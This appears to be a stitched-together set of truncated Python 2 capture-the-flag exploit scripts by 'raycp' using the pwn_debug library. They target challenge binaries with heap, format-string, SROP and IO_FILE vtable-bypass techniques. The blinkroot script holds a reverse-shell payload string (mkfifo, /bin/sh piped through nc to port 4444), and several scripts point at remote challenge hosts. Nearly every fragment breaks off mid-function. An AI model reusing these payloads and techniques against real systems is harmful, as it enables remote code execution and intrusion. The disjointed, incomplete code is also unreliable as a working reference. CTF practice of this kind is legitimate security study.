def run_exp(ip, port, remote):
global pdbg
global p
global membp
global elf
global libc
pdbg = pwn_debug("./babycpp")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#elf=pdbg.elf
#libc=pdbg.libc
pdbg.local()
pdbg.debug("2.27")
pdbg.remote(ip, port)
while 1:
try:
p = pdbg.run("local")
#p=pdbg.run("remote")
#p=pdbg.run("debug")
elf = pdbg.elf
libc = pdbg.libc
if not remote:
membp = pdbg.membp
flag = pwn(remote)
if flag:
print flag
return flag
except Exception, e:
print str(e)
p.close()
def run_exp(ip,port,remote):
global pdbg
global p
global membp
global elf
global libc
pdbg=pwn_debug("./one")
pdbg.context.terminal=['tmux', 'splitw', '-h']
pdbg.local()
pdbg.debug("2.27")
pdbg.remote(ip, port)
#p=pdbg.run("local")
#p=pdbg.run("remote")
if not remote:
p=pdbg.run("debug")
#p=pdbg.run("local")
membp=pdbg.membp
else:
p=pdbg.run("remote")
elf=pdbg.elf
libc=pdbg.libc
flag=pwn(remote)
return flag
def run_exp(ip, port, remote):
global pdbg
global p
global membp
global elf
global libc
pdbg = pwn_debug("./trywrite")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.context.log_level="debug"
pdbg.local("./libc-2.27.so")
pdbg.debug("2.27")
pdbg.remote(ip, port)
if not remote:
#p=pdbg.run("debug")
p = pdbg.run("local")
membp = pdbg.membp
else:
p = pdbg.run("remote")
elf = pdbg.elf
libc = pdbg.libc
flag = pwn(remote)
return flag
def run_exp(ip, port, remote):
global pdbg
global p
global membp
global elf
global libc
pdbg = pwn_debug("./random")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.context.log_level='debug'
pdbg.local("./libc-2.23.so", "/glibc/x64/2.23/lib/ld-2.23.so")
pdbg.debug("2.23")
pdbg.remote(ip, port, "./libc-2.23.so")
if not remote:
#p=pdbg.run("debug")
p = pdbg.run("local")
membp = pdbg.membp
else:
p = pdbg.run("remote")
elf = pdbg.elf
libc = pdbg.libc
flag = pwn(remote)
return flag
# File: exp.py
# Author: raycp
# Date: 2019-06-10
# Description: exp for neighbor_c, bruteforce to guess stack addr and stdout addt by 4bytes, and change stderr.fileno to 1, which then can leak address. then write one gadget to malloc_hook, at last trigger malloc
from pwn_debug import *
pdbg = pwn_debug("./neighbor_c")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def format_one(payload):
p.sendline(payload)
from pwn_debug import *
pdbg = pwn_debug("./anti")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
pdbg.local("")
pdbg.debug("2.23")
pdbg.remote('172.1.2.15', 9999, "./libc-2.23.so")
switch = 1
if switch == 1:
p = pdbg.run("local")
elif switch == 2:
p = pdbg.run("debug")
elif switch == 3:
p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
s = lambda data: p.send(str(data)) #in case that data is an int
sa = lambda delim, data: p.sendafter(str(delim), str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(str(delim), str(data))
r = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
it = lambda: p.interactive()
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
bp = lambda bkp: pdbg.bp(bkp)
sym = lambda symbol: pdbg.sym(symbol)
def bpp():
# File: IO_FILE_str_finish_vtable_bypass.py
# Author: raycp
# Date: 2019-06-01
# Description: template for bypass vtable check with str_jumps vtable
from pwn_debug import *
pdbg=pwn_debug("./binary")
pdbg.context.terminal=['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.23")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
def pwn():
#pdbg.bp([])
libc_base=0x0
io_list_all=libc_base+libc.symbols['_IO_list_all']
# File: exp.py
# Author: raycp
# Date: 2019-06-02
# Description: exp for syscall_interface
from pwn_debug import *
pdbg = pwn_debug("./syscall_interface")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#context.log_level="debug"
#pdbg.local()
pdbg.debug("2.23")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def syscall(syscall_number, arg):
p.recvuntil("choice:")
p.sendline("0")
p.recvuntil("number:")
p.sendline(str(syscall_number))
from pwn_debug import *
pdbg=pwn_debug("./babygame")
pdbg.context.terminal=['tmux', 'splitw', '-h']
context.log_level='debug'
pdbg.local("")
pdbg.debug("2.23")
pdbg.remote()
switch=1
if switch==1:
p=pdbg.run("local")
elif switch==2:
p=pdbg.run("debug")
elif switch==3:
p=pdbg.run("remote")
#-----------------------------------------------------------------------------------------
s = lambda data :p.send(str(data)) #in case that data is an int
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
it = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
bp = lambda bkp :pdbg.bp(bkp)
sym = lambda symbol :pdbg.sym(symbol)
def bpp():
bp([])
# File: exp.py
# Author: raycp
# Date: 2019-06-09
# Description: exp for HeapsOfPrint, form a loop by format vlun and write by rbp
from pwn_debug import *
pdbg = pwn_debug("./HeapsOfPrint")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def format_one(payload):
p.sendline(payload)
from pwn_debug import *
## step 1
pdbg = pwn_debug("test-fopen")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
## step 2
pdbg.local("libc.so.6")
pdbg.debug("2.23")
#pdbg.remote('34.92.96.238',10000)
## step 3
#p=pdbg.run("debug")
#p=pdbg.run("remote")
# pause()
pdbg.bp([0x400450])
p = pdbg.run("local")
p.interactive()
# File: exp.py
# Author: raycp
# Date: 2019-05-31
# Description: exp for blinkroot
from pwn_debug import *
pdbg = pwn_debug("./blinkroot")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.23")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")
elf = pdbg.elf
libc = pdbg.libc
def pwn():
addr = 0x600BC0
plt0 = 0x600B40
payload = p64(0x10000000000000000 - (addr - plt0))
payload += p64(addr + 0x100)
payload += "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f"
payload = payload.ljust(0x100, '\x00')
# File: exp.py
# Author: raycp
# Date: 2019-06-02
# Description: exp for gundam
from pwn_debug import *
pdbg=pwn_debug("./gundam")
pdbg.context.terminal=['tmux', 'splitw', '-h']
pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def add(name,typ):
p.recvuntil("choice : ")
p.sendline("1")
p.recvuntil("gundam :")
# File: exp.py
# Author: raycp
# Date: 2019-06-03
# Description: exp for baby_tcache, unlink to form overlap chunk by off-by-null vuln,bruteforce to overwrite stdout to leak
from pwn_debug import *
pdbg = pwn_debug("./baby_tcache")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
pdbg.local("./libc-2.27.so", "/glibc/x64/2.27/lib/ld-2.27.so")
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
p = pdbg.run("local")
#p=pdbg.run("remote")
#p=pdbg.run("debug")
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def new(size, content):
p.recvuntil("choice: ")
p.sendline("1")
p.recvuntil("Size:")
from pwn_debug import *
import time
pdbg = pwn_debug("printf_test")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
pdbg.local("")
pdbg.remote()
switch = 1
if switch == 1:
p = pdbg.run("local")
elif switch == 2:
p = pdbg.run("debug")
elif switch == 3:
p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
s = lambda data: p.send(str(data)) #in case that data is an int
sa = lambda delim, data: p.sendafter(str(delim), str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(str(delim), str(data))
r = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
it = lambda: p.interactive()
uu32 = lambda data: u32(data.ljust(4, ''))
uu64 = lambda data: u64(data.ljust(8, ''))
bp = lambda bkp: pdbg.bp(bkp)
def bpp(m=[]):
bp(m)
# File: exp.py
# Author: raycp
# Date: 2019-05-21
# Description: exp for babyprintf_ver2
from pwn_debug import *
pdbg = pwn_debug("babyprintf_ver2")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.context.log_level="debug"
pdbg.local("./libc64.so", "/glibc/x64/2.27/lib/ld-2.27.so")
pdbg.debug("2.24")
pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")
membp = pdbg.membp
#print type(pdbg.membp)
#print pdbg.hh
print hex(membp.elf_base), hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#a=IO_FILE_plus()
#print a
#a.show()
#print a._IO_read_base
def do_one(data):
p.send(data)
# File: exp.py
# Author: raycp
# Date: 2019-05-28
# Description: exp for 2ez4u
from pwn_debug import *
pdbg=pwn_debug("./2ez4u")
pdbg.context.terminal=['tmux', 'splitw', '-h']
pdbg.local("./libc.so","/glibc/x64/2.24/lib/ld-2.24.so")
pdbg.debug("2.24")
pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")
membp=pdbg.membp
#print type(pdbg.membp)
#print pdbg.hh
#print hex(membp.elf_base),hex(membp.libc_base)
#elf=pdbg.elf
libc=pdbg.libc
#a=IO_FILE_plus()
#print a
#a.show()
#print a._IO_read_basei
def add(size,desc,color='0',value='0',num='0'):
p.recvuntil("hoice: ")
p.sendline("1")
# File: exp.py
# Author: raycp
# Date: 2019-05-31
# Description: exp for babystack
from pwn_debug import *
pdbg = pwn_debug("./babystack")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.23")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#a=IO_FILE_plus()
#print a
#a.show()
def pwn():
p3_ret = 0x080484e9 #: pop esi ; pop edi ; pop ebp ; ret
pebp_ret = 0x080484eb #: pop ebp ; ret
leave_ret = 0x080483a8 # : leave ; ret
# File: exp.py
# Author: raycp
# Date: 2019-06-06
# Description: exp for house of atum, tcache and fastbin chain to form the 0x10 byte backwards
from pwn_debug import *
pdbg = pwn_debug("./houseofAtum")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def add(content):
p.recvuntil("choice:")
p.sendline("1")
p.recvuntil("ontent:")
# File: exp.py
# Author: raycp
# Date: 2019-06-03
# Description: exp for god-the-reum,uaf in withdraw function
from pwn_debug import *
pdbg = pwn_debug("./god-the-reum")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
pdbg.local("./libc-2.27.so", "/glibc/x64/2.27/lib/ld-2.27.so")
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
p = pdbg.run("local")
#p=pdbg.run("remote")
#p=pdbg.run("debug")
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def create(eth):
p.recvuntil("choice : ")
p.sendline("1")
p.recvuntil("eth? : ")
# File: exp.py
# Author: raycp
# Date: 2019-06-02
# Description: template for srop
from pwn_debug import *
pdbg = pwn_debug("./smallest")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.23")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def pwn():
## sigreturn syscall number is 15 in x64, 119 in x86
frame = SigreturnFrame()
from pwn_debug import *
pdbg = pwn_debug("./pwn")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
pdbg.local("")
pdbg.remote()
switch = 1
if switch == 1:
p = pdbg.run("local")
elif switch == 2:
p = pdbg.run("debug")
elif switch == 3:
p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
s = lambda data: p.send(str(data)) #in case that data is an int
sa = lambda delim, data: p.sendafter(str(delim), str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(str(delim), str(data))
r = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
it = lambda: p.interactive()
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
bp = lambda bkp: pdbg.bp(bkp)
def bpp():
bp([])
# File: exp.py
# Author: raycp
# Date: 2019-06-03
# Description: exp for children_tcache,unlink to form overlap chunk by off-by-null vuln
from pwn_debug import *
pdbg=pwn_debug("./children_tcache")
pdbg.context.terminal=['tmux', 'splitw', '-h']
pdbg.local("./libc-2.27.so","/glibc/x64/2.27/lib/ld-2.27.so")
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
p=pdbg.run("local")
#p=pdbg.run("remote")
#p=pdbg.run("debug")
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def new(size,content):
p.recvuntil("choice: ")
p.sendline("1")
# File: exp.py
# Author: raycp
# Date: 2019-06-06
# Description: exp for three, uaf to brute force to overwrite stdout to leak libc
from pwn_debug import *
pdbg=pwn_debug("./three")
pdbg.context.terminal=['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def add(content):
p.recvuntil("choice:")
p.sendline("1")
# File: exp.py
# Author: raycp
# Date: 2019-05-29
# Description: exp for heapstorm2
from pwn_debug import *
pdbg = pwn_debug("./heapstorm2")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
pdbg.local("")
pdbg.debug("2.23")
pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")
membp = pdbg.membp
#print type(pdbg.membp)
#print pdbg.hh
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#a=IO_FILE_plus()
#print a
#a.show()
#print a._IO_read_basei
def add(size, ):
p.recvuntil("mand: ")
# File: exp.py
# Author: raycp
# Date: 2019-06-06
# Description: exp for girlfriend, bypass double free check for tcache in glibc 2.29
from pwn_debug import *
pdbg = pwn_debug("./chall")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def add(size, name, phone):
p.recvuntil("choice:")
p.sendline("1")
p.recvuntil("girl's name")
from pwn_debug import *
import time
pdbg = pwn_debug("pwn")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
pdbg.local("")
pdbg.remote()
switch = 1
if switch == 1:
p = pdbg.run("local")
elif switch == 2:
p = pdbg.run("debug")
elif switch == 3:
p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
s = lambda data: p.send(str(data)) #in case that data is an int
sa = lambda delim, data: p.sendafter(str(delim), str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(str(delim), str(data))
r = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
it = lambda: p.interactive()
uu32 = lambda data: u32(data.ljust(4, '\x00'))
uu64 = lambda data: u64(data.ljust(8, '\x00'))
bp = lambda bkp: pdbg.bp(bkp)
def bpp(m=[]):
bp(m)
input()
# File: exp.py
# Author: raycp
# Date: 2019-05-21
# Description: exp for stackoverflow
from pwn_debug import *
pdbg=pwn_debug("stackoverflow")
pdbg.context.terminal=['tmux', 'splitw', '-h']
pdbg.local()
pdbg.debug("2.24")
pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")
membp=pdbg.membp
#print type(pdbg.membp)
#print pdbg.hh
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#a=IO_FILE_plus()
#print a
#a.show()
#print a._IO_read_base
def malloc_one(size=0,data="",real_size=0,flag=False):
p.recvuntil("flow: ")
p.sendline(str(size))
# File: exp.py
# Author: raycp
# Date: 2019-06-08
# Description: exp for EasiestPrintf, trigger malloc by printf
from pwn_debug import *
pdbg = pwn_debug("./EasiestPrintf")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def pwn():
pdbg.bp(0x804881C)
p.recvuntil("read:\n")
# File: exp.py
# Author: raycp
# Date: 2019-05-29
# Description: exp for babyheap
from pwn import *
from pwn_debug import *
pdbg=pwn_debug("babyheap")
pdbg.context.terminal=['tmux', 'splitw', '-h']
pdbg.local("./libc-2.23.so")
pdbg.debug("2.23")
pdbg.remote('123.206.174.203', 20001,"./libc-2.23.so")
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")
#membp=pdbg.membp
#print type(pdbg.membp)
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#a=IO_FILE_plus()
#print a
#a.show()
#print a._IO_read_base
def add(size):
p.recvuntil("Choice: ")
